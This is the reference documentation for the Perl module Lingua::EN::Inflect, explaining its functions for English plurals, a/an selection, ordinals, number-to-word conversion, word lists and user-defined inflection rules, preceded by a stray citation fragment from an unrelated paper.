author={Dragomir Radev and Rui Zhang and Amrit Rau and Abhinand Sivaprasad and Chiachun Hsieh and Nazneen Fatema Rajani and Xiangru Tang and Aadit Vyas and Neha Verma and Pranav Krishna and Yangxiaokang Liu and Nadia Irwanto and Jessica Pan and Faiaz Rahman and Ahmad Zaidi and Murori Mutuma and Yasin Tarabar and Ankit Gupta and Tao Yu and Yi Chern Tan and Xi Victoria Lin and Caiming Xiong and Richard Socher},
journal={arXiv preprint arXiv:2007.02871},
year={2020}
|
NAME
VERSION
SYNOPSIS
DESCRIPTION
FORMING PLURALS
OTHER VERB FORMS
PROVIDING INDEFINITE ARTICLES
INFLECTING ORDINALS
CONVERTING NUMBERS TO WORDS
CONVERTING LISTS OF WORDS TO PHRASES
INTERPOLATING INFLECTIONS IN STRINGS
MODERN VS CLASSICAL INFLECTIONS
USER-DEFINED INFLECTIONS
DIAGNOSTICS
OTHER ISSUES
NOTE
AUTHOR
BUGS AND IRRITATIONS
COPYRIGHT
NAME
Lingua::EN::Inflect - Convert singular to plural. Select "a" or "an".
VERSION
This document describes version 1.904 of Lingua::EN::Inflect
SYNOPSIS
use Lingua::EN::Inflect qw ( PL PL_N PL_V PL_ADJ NO NUM
PL_eq PL_N_eq PL_V_eq PL_ADJ_eq
A AN
PART_PRES
ORD NUMWORDS
WORDLIST
inflect classical
def_noun def_verb def_adj def_a def_an );
# UNCONDITIONALLY FORM THE PLURAL
print "The plural of ", $word, " is ", PL($word), "\n";
# CONDITIONALLY FORM THE PLURAL
print "I saw $cat_count ", PL("cat",$cat_count), "\n";
# FORM PLURALS FOR SPECIFIC PARTS OF SPEECH
print PL_N("I",$N1), PL_V("saw",$N1),
PL_ADJ("my",$N2), PL_N("saw",$N2), "\n";
# DEAL WITH "0/1/N" -> "no/1/N" TRANSLATION:
print "There ", PL_V("was",$errors), NO(" error",$errors), "\n";
# USE DEFAULT COUNTS:
print NUM($N1,""), PL("I"), PL_V(" saw"), NUM($N2), PL_N(" saw");
print "There ", NUM($errors,''), PL_V("was"), NO(" error"), "\n";
# COMPARE TWO WORDS "NUMBER-INSENSITIVELY":
print "same\n" if PL_eq($word1, $word2);
print "same noun\n" if PL_N_eq($word1, $word2);
print "same verb\n" if PL_V_eq($word1, $word2);
print "same adj.\n" if PL_ADJ_eq($word1, $word2);
# ADD CORRECT "a" OR "an" FOR A GIVEN WORD:
print "Did you want ", A($thing), " or ", AN($idea), "\n";
# CONVERT NUMERALS INTO ORDINALS (i.e. 1->1st, 2->2nd, 3->3rd, etc.)
print "It was", ORD($position), " from the left\n";
# CONVERT NUMERALS TO WORDS (i.e. 1->"one", 101->"one hundred and one", etc.)
# IN A SCALAR CONTEXT: GET BACK A SINGLE STRING...
$words = NUMWORDS(1234); # "one thousand, two hundred and thirty-four"
$words = NUMWORDS(ORD(1234)); # "one thousand, two hundred and thirty-fourth"
# IN A LIST CONTEXT: GET BACK A LIST OF STRINGSi, ONE FOR EACH "CHUNK"...
@words = NUMWORDS(1234); # ("one thousand","two hundred and thirty-four")
# OPTIONAL PARAMETERS CHANGE TRANSLATION:
$words = NUMWORDS(12345, group=>1);
# "one, two, three, four, five"
$words = NUMWORDS(12345, group=>2);
# "twelve, thirty-four, five"
$words = NUMWORDS(12345, group=>3);
# "one twenty-three, forty-five"
$words = NUMWORDS(1234, 'and'=>'');
# "one thousand, two hundred thirty-four"
$words = NUMWORDS(1234, 'and'=>', plus');
# "one thousand, two hundred, plus thirty-four"
$words = NUMWORDS(555_1202, group=>1, zero=>'oh');
# "five, five, five, one, two, oh, two"
$words = NUMWORDS(555_1202, group=>1, one=>'unity');
# "five, five, five, unity, two, zero, two"
$words = NUMWORDS(123.456, group=>1, decimal=>'mark');
# "one two three mark four five six"
# LITERAL STYLE ONLY NAMES NUMBERS LESS THAN A CERTAIN THRESHOLD...
$words = NUMWORDS( 9, threshold=>10); # "nine"
$words = NUMWORDS( 10, threshold=>10); # "ten"
$words = NUMWORDS( 11, threshold=>10); # "11"
$words = NUMWORDS(1000, threshold=>10); # "1,000"
# JOIN WORDS INTO A LIST:
$list = WORDLIST("apple", "banana", "carrot");
# "apple, banana, and carrot"
$list = WORDLIST("apple", "banana");
# "apple and banana"
$list = WORDLIST("apple", "banana", "carrot", {final_sep=>""});
# "apple, banana and carrot"
# REQUIRE "CLASSICAL" PLURALS (EG: "focus"->"foci", "cherub"->"cherubim")
classical; # USE ALL CLASSICAL PLURALS
classical 1; # USE ALL CLASSICAL PLURALS
classical 0; # USE ALL MODERN PLURALS (DEFAULT)
classical 'zero'; # "no error" INSTEAD OF "no errors"
classical zero=>1; # "no error" INSTEAD OF "no errors"
classical zero=>0; # "no errors" INSTEAD OF "no error"
classical 'herd'; # "2 buffalo" INSTEAD OF "2 buffalos"
classical herd=>1; # "2 buffalo" INSTEAD OF "2 buffalos"
classical herd=>0; # "2 buffalos" INSTEAD OF "2 buffalo"
classical 'persons'; # "2 chairpersons" INSTEAD OF "2 chairpeople"
classical persons=>1; # "2 chairpersons" INSTEAD OF "2 chairpeople"
classical persons=>0; # "2 chairpeople" INSTEAD OF "2 chairpersons"
classical 'ancient'; # "2 formulae" INSTEAD OF "2 formulas"
classical ancient=>1; # "2 formulae" INSTEAD OF "2 formulas"
classical ancient=>0; # "2 formulas" INSTEAD OF "2 formulae"
# INTERPOLATE "PL()", "PL_N()", "PL_V()", "PL_ADJ()", A()", "AN()"
# "NUM()" AND "ORD()" WITHIN STRINGS:
print inflect("The plural of $word is PL($word)\n");
print inflect("I saw $cat_count PL(cat,$cat_count)\n");
print inflect("PL(I,$N1) PL_V(saw,$N1) PL(a,$N2) PL_N(saw,$N2)\n");
print inflect("NUM($N1,)PL(I) PL_V(saw) NUM($N2,)PL(a) PL_N(saw)\n");
print inflect("I saw NUM($cat_count) PL(cat)\n");
print inflect("There PL_V(was,$errors) NO(error,$errors)\n");
print inflect("There NUM($errors,)PL_V(was) NO(error)\n");
print inflect("Did you want A($thing) or AN($idea)\n");
print inflect("It was ORD($position) from the left\n");
# ADD USER-DEFINED INFLECTIONS (OVERRIDING INBUILT RULES):
def_noun "VAX" => "VAXen"; # SINGULAR => PLURAL
def_verb "will" => "shall", # 1ST PERSON SINGULAR => PLURAL
"will" => "will", # 2ND PERSON SINGULAR => PLURAL
"will" => "will"; # 3RD PERSON SINGULAR => PLURAL
def_adj "hir" => "their"; # SINGULAR => PLURAL
def_a "h"; # "AY HALWAYS SEZ 'HAITCH'!"
def_an "horrendous.*"; # "AN HORRENDOUS AFFECTATION"
DESCRIPTION
[ Note: This module is strictly in maintenance mode now. Take a look at the newer Lingua::EN::Inflexion module, which offers a cleaner and more convenient interface, has many more features (including plural->singular inflexions), and is also much better tested. If you have existing code that relies on Lingua::EN::Inflect, see the section of the documentation entitled "CONVERTING FROM LINGUA::EN::INFLECT". ]
The exportable subroutines of Lingua::EN::Inflect provide plural inflections, "a"/"an" selection for English words, and manipulation of numbers as words
Plural forms of all nouns, most verbs, and some adjectives are provided. Where appropriate, "classical" variants (for example: "brother" -> "brethren", "dogma" -> "dogmata", etc.) are also provided.
Pronunciation-based "a"/"an" selection is provided for all English words, and most initialisms.
It is also possible to inflect numerals (1,2,3) to ordinals (1st, 2nd, 3rd) and to English words ("one", "two", "three).
In generating these inflections, Lingua::EN::Inflect follows the Oxford English Dictionary and the guidelines in Fowler's Modern English Usage, preferring the former where the two disagree.
The module is built around standard British spelling, but is designed to cope with common American variants as well. Slang, jargon, and other English dialects are not explicitly catered for.
Where two or more inflected forms exist for a single word (typically a "classical" form and a "modern" form), Lingua::EN::Inflect prefers the more common form (typically the "modern" one), unless "classical" processing has been specified (see "MODERN VS CLASSICAL INFLECTIONS").
All of the PL_... plural inflection subroutines take the word to be inflected as their first argument and return the corresponding inflection. Note that all such subroutines expect the singular form of the word. The results of passing a plural form are undefined (and unlikely to be correct).
The PL_... subroutines also take an optional second argument, which indicates the grammatical "number" of the word (or of another word with which the word being inflected must agree). If the "number" argument is supplied and is not 1 (or "one" or "a", or some other adjective that implies the singular), the plural form of the word is returned. If the "number" argument does indicate singularity, the (uninflected) word itself is returned. If the number argument is omitted, the plural form is returned unconditionally.
The various subroutines are:
PL_N($;$)
The exportable subroutine
PL_N()takes asingularEnglish noun or pronoun and returns its plural. Pronouns in the nominative ("I" -> "we") and accusative ("me" -> "us") cases are handled, as are possessive pronouns ("mine" -> "ours").
PL_V($;$)
The exportable subroutine
PL_V()takes thesingularform of a conjugated verb (that is, one which is already in the correct "person" and "mood") and returns the corresponding plural conjugation.
PL_ADJ($;$)
The exportable subroutine
PL_ADJ()takes thesingularform of certain types of adjectives and returns the corresponding plural form. Adjectives that are correctly handled include: "numerical" adjectives ("a" -> "some"), demonstrative adjectives ("this" -> "these", "that" -> "those"), and possessives ("my" -> "our", "cat's" -> "cats'", "child's" -> "childrens'", etc.)
PL($;$)
The exportable subroutine
PL()takes asingularEnglish noun, pronoun, verb, or adjective and returns its plural form. Where a word has more than one inflection depending on its part of speech (for example, the noun "thought" inflects to "thoughts", the verb "thought" to "thought"), the (singular) noun sense is preferred to the (singular) verb sense.
Hence
PL("knife")will return "knives" ("knife" having been treated as a singular noun), whereasPL("knifes")will return "knife" ("knifes" having been treated as a 3rd person singular verb).
The inherent ambiguity of such cases suggests that, where the part of speech is known,
PL_N,PL_V, andPL_ADJshould be used in preference toPL.
Note that all these subroutines ignore any whitespace surrounding the word being inflected, but preserve that whitespace when the result is returned. For example, PL(" cat ") returns " cats ".
The PL_... subroutines return only the inflected word, not the count that was used to inflect it. Thus, in order to produce "I saw 3 ducks", it is necessary to use:
print "I saw $N ", PL_N($animal,$N), "\n";
Since the usual purpose of producing a plural is to make it agree with a preceding count, Lingua::EN::Inflect provides an exportable subroutine (NO($;$)) which, given a word and a(n optional) count, returns the count followed by the correctly inflected word. Hence the previous example can be rewritten:
print "I saw ", NO($animal,$N), "\n";
In addition, if the count is zero (or some other term which implies zero, such as "zero", "nil", etc.) the count is replaced by the word "no". Hence, if $N had the value zero, the previous example would print the somewhat more elegant:
I saw no animals
rather than:
I saw 0 animals
Note that the name of the subroutine is a pun: the subroutine returns either a number (a No.) or a "no", in front of the inflected word.
The NO() subroutine takes an optional third argument: a hash of named options that configure its behaviour.
The 'words_below' option informs NO() what other numbers (i.e. apart from zero) it should convert to words. For example:S
for my $count (0..12) {
print NO('cat', $count, {words_below => 10}), "\n";
}
would print:
no cats one cat two cats three cats four cats five cats six cats seven cats eight cats nine cats 10 cats 11 cats 12 cats
The 'comma' and 'comma_every' options determine whether or not the numbers produced by NO() have commas in them. That is:
2001 space odysseys
versus:
2,001 space odysseys
Normally, numbers are produced without commas, but if 'comma' or 'comma_every' is specified, then commas are added as requested.
The 'comma' option specifies which character to use as a comma. It defaults to ',', but may be set to anything convenient:
print NO('Euro', $amount, {comma=>'.'});
# prints: 1.000.000 Euros
The 'comma_every' option specifies how many characters between commas. It defaults to 3, but may be set to any positive number:
print NO('Euro', $amount, {comma_every=>4});
# prints: 100,0000 Euros
Note that you can set both options at once, if you wish:
print NO('Euro', $amount, {comma_every=>2, comma=>'_'});
# prints: 1_00_00_00 Euros
In some contexts, the need to supply an explicit count to the various PL_... subroutines makes for tiresome repetition. For example:
print PL_ADJ("This",$errors), PL_N(" error",$errors),
PL_V(" was",$errors), " fatal.\n";
Lingua::EN::Inflect therefore provides an exportable subroutine (NUM($;$)) that may be used to set a persistent "default number" value. If such a value is set, it is subsequently used whenever an optional second "number" argument is omitted. The default value thus set can subsequently be removed by calling NUM() with no arguments. Hence we could rewrite the previous example:
NUM($errors);
print PL_ADJ("This"), PL_N(" error"), PL_V(" was"), "fatal.\n";
NUM();
Normally, NUM() returns its first argument, so that it may also be "inlined" in contexts like:
print NUM($errors), PL_N(" error"), PL_V(" was"), " detected.\n"
print PL_ADJ("This"), PL_N(" error"), PL_V(" was"), "fatal.\n"
if $severity > 1;
However, in certain contexts (see "INTERPOLATING INFLECTIONS IN STRINGS") it is preferable that NUM() return an empty string. Hence NUM() provides an optional second argument. If that argument is supplied (that is, if it is defined) and evaluates to false, NUM returns an empty string instead of its first argument. For example:
print NUM($errors,0), NO("error"), PL_V(" was"), " detected.\n";
print PL_ADJ("This"), PL_N(" error"), PL_V(" was"), "fatal.\n"
if $severity > 1;
Lingua::EN::Inflect also provides a solution to the problem of comparing words of differing plurality through the exportable subroutines PL_eq($$), PL_N_eq($$), PL_V_eq($$), and PL_ADJ_eq($$). Each of these subroutines takes two strings, and compares them using the corresponding plural-inflection subroutine (PL(), PL_N(), PL_V(), and PL_ADJ() respectively).
The comparison returns true if:
the strings are
eq-equal, or
one string is
eq-equal to a plural form of the other, or
the strings are two different plural forms of the one word.
Hence all of the following return true:
PL_eq("index","index") # RETURNS "eq"
PL_eq("index","indexes") # RETURNS "s:p"
PL_eq("index","indices") # RETURNS "s:p"
PL_eq("indexes","index") # RETURNS "p:s"
PL_eq("indices","index") # RETURNS "p:s"
PL_eq("indices","indexes") # RETURNS "p:p"
PL_eq("indexes","indices") # RETURNS "p:p"
PL_eq("indices","indices") # RETURNS "eq"
As indicated by the comments in the previous example, the actual value returned by the various PL_eq subroutines encodes which of the three equality rules succeeded: "eq" is returned if the strings were identical, "s:p" if the strings were singular and plural respectively, "p:s" for plural and singular, and "p:p" for two distinct plurals. Inequality is indicated by returning an empty string.
It should be noted that two distinct singular words which happen to take the same plural form are not considered equal, nor are cases where one (singular) word's plural is the other (plural) word's singular. Hence all of the following return false:
PL_eq("base","basis") # ALTHOUGH BOTH -> "bases"
PL_eq("syrinx","syringe") # ALTHOUGH BOTH -> "syringes"
PL_eq("she","he") # ALTHOUGH BOTH -> "they"
PL_eq("opus","operas") # ALTHOUGH "opus" -> "opera" -> "operas"
PL_eq("taxi","taxes") # ALTHOUGH "taxi" -> "taxis" -> "taxes"
Note too that, although the comparison is "number-insensitive" it is not case-insensitive (that is, PL("time","Times") returns false. To obtain both number and case insensitivity, prefix both arguments with lc (that is, PL(lc "time", lc "Times") returns true).
Lingua::EN::Inflect also provides the PART_PRES subroutine, which can take a 3rd person singular verb and correctly inflect it to its present participle:
PART_PRES("runs") # "running"
PART_PRES("loves") # "loving"
PART_PRES("eats") # "eating"
PART_PRES("bats") # "batting"
PART_PRES("spies") # "spying"
Lingua::EN::Inflect provides two exportable subroutines (A($;$) and AN($;$)) which will correctly prepend the appropriate indefinite article to a word, depending on its pronunciation. For example:
A("cat") # -> "a cat"
AN("cat") # -> "a cat"
A("euphemism") # -> "a euphemism"
A("Euler number") # -> "an Euler number"
A("hour") # -> "an hour"
A("houri") # -> "a houri"
The two subroutines are identical in function and may be used interchangeably. The only reason that two versions are provided is to enhance the readability of code such as:
print "That is ", AN($errortype), " error\n;
print "That is ", A($fataltype), " fatal error\n;
Note that in both cases the actual article provided depends only on the pronunciation of the first argument, not on the name of the subroutine.
A() and AN() will ignore any indefinite article that already exists at the start of the string. Thus:
@half_arked = (
"a elephant",
"a giraffe",
"an ewe",
"a orangutan",
);
print A($_), "\n" for @half_arked;
# prints:
# an elephant
# a giraffe
# a ewe
# an orangutan
A() and AN() both take an optional second argument. As with the PL_... subroutines, this second argument is a "number" specifier. If its value is 1 (or some other value implying singularity), A() and AN() insert "a" or "an" as appropriate. If the number specifier implies plurality, (A() and AN() insert the actual second argument instead. For example:
A("cat",1) # -> "a cat"
A("cat",2) # -> "2 cat"
A("cat","one") # -> "one cat"
A("cat","no") # -> "no cat"
Note that, as implied by the previous examples, A() and AN() both assume that their job is merely to provide the correct qualifier for a word (that is: "a", "an", or the specified count). In other words, they assume that the word they are given has already been correctly inflected for plurality. Hence, if $N has the value 2, then:
print A("cat",$N);
prints "2 cat", instead of "2 cats". The correct approach is to use:
print A(PL("cat",$N),$N);
or, better still:
print NO("cat",$N);
Note too that, like the various PL_... subroutines, whenever A() and AN() are called with only one argument they are subject to the effects of any preceding call to NUM(). Hence, another possible solution is:
NUM($N);
print A(PL("cat"));
"Initialisms" (sometimes inaccurately called "acronyms") are terms which have been formed from the initial letters of words in a phrase (for example, "NATO", "NBL", "S.O.S.", "SCUBA", etc.)
Such terms present a particular challenge when selecting between "a" and "an", since they are sometimes pronounced as if they were a single word ("nay-tow", "sku-ba") and sometimes as a series of letter names ("en-eff-ell", "ess-oh-ess").
A() and AN() cope with this dichotomy using a series of inbuilt rules, which may be summarized as:
If the word starts with a single letter, followed by a period or dash (for example, "R.I.P.", "C.O.D.", "e-mail", "X-ray", "T-square"), then choose the appropriate article for the
soundof the first letter ("an R.I.P.", "a C.O.D.", "an e-mail", "an X-ray", "a T-square").
If the first two letters of the word are capitals, consonants, and do not appear at the start of any known English word, (for example, "LCD", "XML", "YWCA"), then once again choose "a" or "an" depending on the
soundof the first letter ("an LCD", "an XML", "a YWCA").
Otherwise, assume the string is a capitalized word or a pronounceable initialism (for example, "LED", "OPEC", "FAQ", "UNESCO"), and therefore takes "a" or "an" according to the (apparent) pronunciation of the entire word ("a LED", "an OPEC", "a FAQ", "a UNESCO").
Note that rules 1 and 3 together imply that the presence or absence of punctuation may change the selection of indefinite article for a particular initialism (for example, "a FAQ" but "an F.A.Q.").
Words beginning in the letter 'H' present another type of difficulty when selecting a suitable indefinite article. In a few such words (for example, "hour", "honour", "heir") the 'H' is not voiced at all, and so such words inflect with "an". The remaining cases ("voiced H's") may be divided into two categories: "hard H's" (such as "hangman", "holograph", "hat", etc.) and "soft H's" (such as "hysterical", "horrendous", "holy", etc.)
Hard H's always take "a" as their indefinite article, and soft H's normally do so as well. But some English speakers prefer "an" for soft H's (although the practice is now generally considered an affectation, rather than a legitimate grammatical alternative).
At present, the A() and AN() subroutines ignore soft H's and use "a" for any voiced 'H'. The author would, however, welcome feedback on this decision (envisaging a possible future "soft H" mode).
Occasionally it is useful to present an integer value as an ordinal rather than as a numeral. For example:
Enter password (1st attempt): ********
Enter password (2nd attempt): *********
Enter password (3rd attempt): *********
No 4th attempt. Access denied.
To this end, Lingua::EN::Inflect provides the ORD() subroutine. <ORD()> takes a single argument and forms its ordinal equivalent. If the argument isn't a numerical integer, it just adds "-th".
The exportable subroutine NUMWORDS takes a number (cardinal or ordinal) and returns an English representation of that number. In a scalar context a string is returned. Hence:
use Lingua::EN::Inflect qw( NUMWORDS );
$words = NUMWORDS(1234567);
puts the string:
"one million, two hundred and thirty-four thousand, five hundred and sixty-seven"
into $words.
In a list context each comma-separated chunk is returned as a separate element. Hence:
@words = NUMWORDS(1234567);
puts the list:
("one million",
"two hundred and thirty-four thousand",
"five hundred and sixty-seven")
into @words.
Note that this also means that:
print NUMWORDS(1234567);
will (misprint) print:
one milliontwo hundred and thirty-four thousandfive hundred and sixty-seven
To get readable output, make sure the call in in scalar context:
print scalar NUMWORDS(1234567);
Non-digits (apart from an optional leading plus or minus sign, any decimal points, and ordinal suffixes -- see below) are silently ignored, so the following all produce identical results:
NUMWORDS(5551202);
NUMWORDS(5_551_202);
NUMWORDS("5,551,202");
NUMWORDS("555-1202");
That last case is a little awkward since it's almost certainly a phone number, and "five million, five hundred and fifty-one thousand, two hundred and two" probably isn't what's wanted.
To overcome this, NUMWORDS() takes an optional named argument, 'group', which changes how numbers are translated. The argument must be a positive integer less than four, which indicated how the digits of the number are to be grouped. If the argument is 1, then each digit is translated separately. If the argument is 2, pairs of digits (starting from the left) are grouped together. If the argument is 3, triples of numbers (again, from the left) are grouped. Hence:
NUMWORDS("555-1202", group=>1)
returns "five, five, five, one, two, zero, two", whilst:
NUMWORDS("555-1202", group=>2)
returns "fifty-five, fifty-one, twenty, two", and:
NUMWORDS("555-1202", group=>3)
returns "five fifty-five, one twenty, two".
Phone numbers are often written in words as "five..five..five..one..two..zero..two", which is also easy to achieve:
join '..', NUMWORDS("555-1202", group=>1)
NUMWORDS also handles decimal fractions. Hence:
NUMWORDS("1.2345")
returns "one point two three four five" in a scalar context and ("one","point","two","three","four","five")) in an array context. Exponent form ("1.234e56") is not yet handled.
Multiple decimal points are only translated in one of the "grouping" modes. Hence:
NUMWORDS(101.202.303)
returns "one hundred and one point two zero two three zero three", whereas:
NUMWORDS(101.202.303, group=>1)
returns "one zero one point two zero two point three zero three".
The digit '0' is unusual in that in may be translated to English as "zero", "oh", or "nought". To cater for this diversity, NUMWORDS may be passed a named argument, 'zero', which may be set to the desired translation of '0'. For example:
print join "..", NUMWORDS("555-1202", group=>3, zero=>'oh')
prints "five..five..five..one..two..oh..two". By default, zero is rendered as "zero".
Likewise, the digit '1' may be rendered as "one" or "a/an" (or very occasionally other variants), depending on the context. So there is a 'one' argument as well:
print NUMWORDS($_, one=>'a solitary', zero=>'no more'),
PL(" bottle of beer on the wall\n", $_)
for (3,2,1,0);
# prints:
# three bottles of beer on the wall
# two bottles of beer on the wall
# a solitary bottle of beer on the wall
# no more bottles of beer on the wall
Care is needed if the word "a/an" is to be used as a 'one' value. Unless the next word is known in advance, it's almost always necessary to use the A function as well:
print A( NUMWORDS(1, one=>'a') . " $_\n")
for qw(cat aardvark ewe hour);
# prints:
# a cat
# an aardvark
# a ewe
# an hour
Another major regional variation in number translation is the use of "and" in certain contexts. The named argument 'and' allows the programmer to specify how "and" should be handled. Hence:
print scalar NUMWORDS("765", 'and'=>'')
prints "seven hundred sixty-five", instead of "seven hundred and sixty-five". By default, the "and" is included.
The translation of the decimal point is also subject to variation (with "point", "dot", and "decimal" being the favorites). The named argument 'decimal' allows the programmer to how the decimal point should be rendered. Hence:
print scalar NUMWORDS("666.124.64.101", group=>3, decimal=>'dot')
prints "six sixty-six, dot, one twenty-four, dot, sixty-four, dot, one zero one" By default, the decimal point is rendered as "point".
NUMWORDS also handles the ordinal forms of numbers. So:
print scalar NUMWORDS('1st');
print scalar NUMWORDS('3rd');
print scalar NUMWORDS('202nd');
print scalar NUMWORDS('1000000th');
print:
first
third
two hundred and twenty-second
one millionth
Two common idioms in this regard are:
print scalar NUMWORDS(ORD($number));
and:
print scalar ORD(NUMWORDS($number));
These are identical in effect, except when $number contains a decimal:
$number = 99.09;
print scalar NUMWORDS(ORD($number)); # ninety-ninth point zero nine
print scalar ORD(NUMWORDS($number)); # ninety-nine point zero ninth
Use whichever you feel is most appropriate.
When creating a list of words, commas are used between adjacent items, except if the items contain commas, in which case semicolons are used. But if there are less than two items, the commas/semicolons are omitted entirely. The final item also has a conjunction (usually "and" or "or") before it. And although it's technically incorrect (and sometimes misleading), some people prefer to omit the comma before that final conjunction, even when there are more than two items.
That's complicated enough to warrant its own subroutine: WORDLIST(). This subroutine expects a list of words, possibly with one or more hash references containing options. It returns a string that joins the list together in the normal English usage. For example:
print "You chose ", WORDLIST(@selected_items), "\n";
# You chose barley soup, roast beef, and Yorkshire pudding
print "You chose ", WORDLIST(@selected_items, {final_sep=>""}), "\n";
# You chose barley soup, roast beef and Yorkshire pudding
print "Please chose ", WORDLIST(@side_orders, {conj=>"or"}), "\n";
# Please chose salad, vegetables, or ice-cream
The available options are:
Option named Specifies Default value
conj Final conjunction "and"
sep Inter-item separator ","
last_sep Final separator value of 'sep' option
By far the commonest use of the inflection subroutines is to produce message strings for various purposes. For example:
print NUM($errors), PL_N(" error"), PL_V(" was"), " detected.\n";
print PL_ADJ("This"), PL_N(" error"), PL_V(" was"), "fatal.\n"
if $severity > 1;
Unfortunately the need to separate each subroutine call detracts significantly from the readability of the resulting code. To ameliorate this problem, Lingua::EN::Inflect provides an exportable string-interpolating subroutine (inflect($)), which recognizes calls to the various inflection subroutines within a string and interpolates them appropriately.
Using inflect the previous example could be rewritten:
print inflect "NUM($errors) PL_N(error) PL_V(was) detected.\n";
print inflect "PL_ADJ(This) PL_N(error) PL_V(was) fatal.\n"
if $severity > 1;
Note that inflect also correctly handles calls to the NUM() subroutine (whether interpolated or antecedent). The inflect() subroutine has a related extra feature, in that it automatically cancels any "default number" value before it returns its interpolated string. This means that calls to NUM() which are embedded in an inflect()-interpolated string do not "escape" and interfere with subsequent inflections.
Certain words, mainly of Latin or Ancient Greek origin, can form plurals either using the standard English "-s" suffix, or with their original Latin or Greek inflections. For example:
PL("stigma") # -> "stigmas" or "stigmata"
PL("torus") # -> "toruses" or "tori"
PL("index") # -> "indexes" or "indices"
PL("millennium") # -> "millenniums" or "millennia"
PL("ganglion") # -> "ganglions" or "ganglia"
PL("octopus") # -> "octopuses" or "octopodes"
Lingua::EN::Inflect caters to such words by providing an "alternate state" of inflection known as "classical mode". By default, words are inflected using their contemporary English plurals, but if classical mode is invoked, the more traditional plural forms are returned instead.
The exportable subroutine classical() controls this feature. If classical() is called with no arguments, it unconditionally invokes classical mode. If it is called with a single argument, it turns all classical inflects on or off (depending on whether the argument is true or false). If called with two or more arguments, those arguments specify which aspects of classical behaviour are to be used.
Thus:
classical; # SWITCH ON CLASSICAL MODE
print PL("formula"); # -> "formulae"
classical 0; # SWITCH OFF CLASSICAL MODE
print PL("formula"); # -> "formulas"
classical $cmode; # CLASSICAL MODE IFF $cmode
print PL("formula"); # -> "formulae" (IF $cmode)
# -> "formulas" (OTHERWISE)
classical herd=>1; # SWITCH ON CLASSICAL MODE FOR "HERD" NOUNS
print PL("wilderbeest"); # -> "wilderbeest"
classical names=>1; # SWITCH ON CLASSICAL MODE FOR NAMES
print PL("sally"); # -> "sallies"
print PL("Sally"); # -> "Sallys"
Note however that classical() has no effect on the inflection of words which are now fully assimilated. Hence:
PL("forum") # ALWAYS -> "forums"
PL("criterion") # ALWAYS -> "criteria"
LEI assumes that a capitalized word is a person's name. So it forms the plural according to the rules for names (which is that you don't inflect, you just add -s or -es). You can choose to turn that behaviour off (it's on by the default, even when the module isn't in classical mode) by calling classical(names=>0).
Lingua::EN::Inflect provides five exportable subroutines which allow the programmer to override the module's behaviour for specific cases:
def_noun($$)
The
def_nounsubroutine takes a pair of string arguments: the singular and plural forms of the noun being specified. The singular form specifies a pattern to be interpolated (asm/^(?:$first_arg)$/i). Any noun matching this pattern is then replaced by the string in the second argument. The second argument specifies a string which is interpolated after the match succeeds, and is then used as the plural form. For example:
def_noun 'cow' => 'kine';
def_noun '(.+i)o' => '$1i';
def_noun 'spam(mer)?' => '\\$\\%\\@#\\$\\@#!!';
Note that both arguments should usually be specified in single quotes, so that they are not interpolated when they are specified, but later (when words are compared to them). As indicated by the last example, care also needs to be taken with certain characters in the second argument, to ensure that they are not unintentionally interpolated during comparison.
The second argument string may also specify a second variant of the plural form, to be used when "classical" plurals have been requested. The beginning of the second variant is marked by a '|' character:
def_noun 'cow' => 'cows|kine';
def_noun '(.+i)o' => '$1os|$1i';
def_noun 'spam(mer)?' => '\\$\\%\\@#\\$\\@#!!|varmints';
If no classical variant is given, the specified plural form is used in both normal and "classical" modes.
If the second argument is
undefinstead of a string, then the current user definition for the first argument is removed, and the standard plural inflection(s) restored.
Note that in all cases, later plural definitions for a particular singular form replace earlier definitions of the same form. For example:
# FIRST, HIDE THE MODERN FORM....
def_noun 'aviatrix' => 'aviatrices';
# LATER, HIDE THE CLASSICAL FORM...
def_noun 'aviatrix' => 'aviatrixes';
# FINALLY, RESTORE THE DEFAULT BEHAVIOUR...
def_noun 'aviatrix' => undef;
Special care is also required when defining general patterns and associated specific exceptions: put the more specific cases
afterthe general pattern. For example:
def_noun '(.+)us' => '$1i'; # EVERY "-us" TO "-i"
def_noun 'bus' => 'buses'; # EXCEPT FOR "bus"
This "try-most-recently-defined-first" approach to matching user-defined words is also used by
def_verb,def_aanddef_an.
def_verb($$$$$$)
The
def_verbsubroutine takes three pairs of string arguments (that is, six arguments in total), specifying the singular and plural forms of the three "persons" of verb. As withdef_noun, the singular forms are specifications of run-time-interpolated patterns, whilst the plural forms are specifications of (up to two) run-time-interpolated strings:
def_verb 'am' => 'are',
'are' => 'are|art',
'is' => 'are';
def_verb 'have' => 'have',
'have' => 'have',
'ha(s|th)' => 'have';
Note that as with
def_noun, modern/classical variants of plurals may be separately specified, subsequent definitions replace previous ones, andundef'ed plural forms revert to the standard behaviour.
def_adj($$)
The
def_adjsubroutine takes a pair of string arguments, which specify the singular and plural forms of the adjective being defined. As withdef_nounanddef_adj, the singular forms are specifications of run-time-interpolated patterns, whilst the plural forms are specifications of (up to two) run-time-interpolated strings:def_adj 'this' => 'these', def_adj 'red' => 'red|gules',
As previously, modern/classical variants of plurals may be separately specified, subsequent definitions replace previous ones, and
undef'ed plural forms revert to the standard behaviour.
def_a($)anddef_an($)
The
def_aanddef_ansubroutines each take a single argument, which specifies a pattern. If a word passed toA()orAN()matches this pattern, it will be prefixed (unconditionally) with the corresponding indefinite article. For example:
def_a 'error';
def_a 'in.+';
def_an 'mistake';
def_an 'error';
As with the other
def_...subroutines, such redefinitions are sequential in effect so that, after the above example, "error" will be inflected with "an".
When it is imported, Lingua::EN::Inflect executes (as Perl code) the contents of any file named .inflectrc which it finds in the in the directory where Lingua/EN/Inflect.pm is installed, or in the current home directory ($ENV{HOME}), or in both. Note that the code is executed within the Lingua::EN::Inflect namespace.
Hence the user or the local Perl guru can make appropriate calls to def_noun, def_verb, etc. in one of these .inflectrc files, to permanently and universally modify the behaviour of the module. For example
> cat /usr/local/lib/perl5/Text/Inflect/.inflectrc
def_noun "UNIX" => "UN*X|UNICES";
def_verb "teco" => "teco", # LITERALLY: "to edit with TECO"
"teco" => "teco",
"tecos" => "teco";
def_a "Euler.*"; # "Yewler" TURNS IN HIS GRAVE
Note that calls to the def_... subroutines from within a program will take precedence over the contents of the home directory .inflectrc file, which in turn takes precedence over the system-wide .inflectrc file.
DIAGNOSTICS
On loading, if the Perl code in a .inflectrc file is invalid (syntactically or otherwise), an appropriate fatal error is issued. A common problem is not ending the file with something that evaluates to true (as the five def_... subroutines do).
Using the five def_... subroutines directly in a program may also result in fatal diagnostics, if a (singular) pattern or an interpolated (plural) string is somehow invalid.
